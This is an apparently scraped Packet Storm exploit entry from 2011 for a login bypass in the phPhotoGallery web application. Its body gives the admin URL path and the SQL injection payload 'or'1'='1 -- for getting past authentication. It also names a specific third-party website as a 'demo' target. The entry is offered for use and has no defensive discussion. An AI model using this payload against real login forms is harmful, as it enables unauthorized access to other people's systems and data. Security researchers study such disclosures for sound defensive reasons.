phPhotoGallery SQL Injection

2011-08-02T00:00:00
ID PACKETSTORM:103669
Type packetstorm
Reporter Izam
Modified 2011-08-02T00:00:00

Description

                                        
                                            `#######################################################################  
# Exploit Title: phPhotoGallery Login bypass  
# Author: Err0r  
# Date: 05.05.2011  
# E-mail: err0riletisim@gmail.com  
# Category: Web App.  
# Note : Warning.  
# Demo: http://www.extrastrength.com/pg/  
# Price : Free  
#######################################################################  
  
[*] ## Exploit ##:  
  
# http://victim/ [ENTER]  
# http://victim/path/index.php?c=admin ~~>> Bypass  
  
'or'1'='1 --  
  
#######################################################################  
`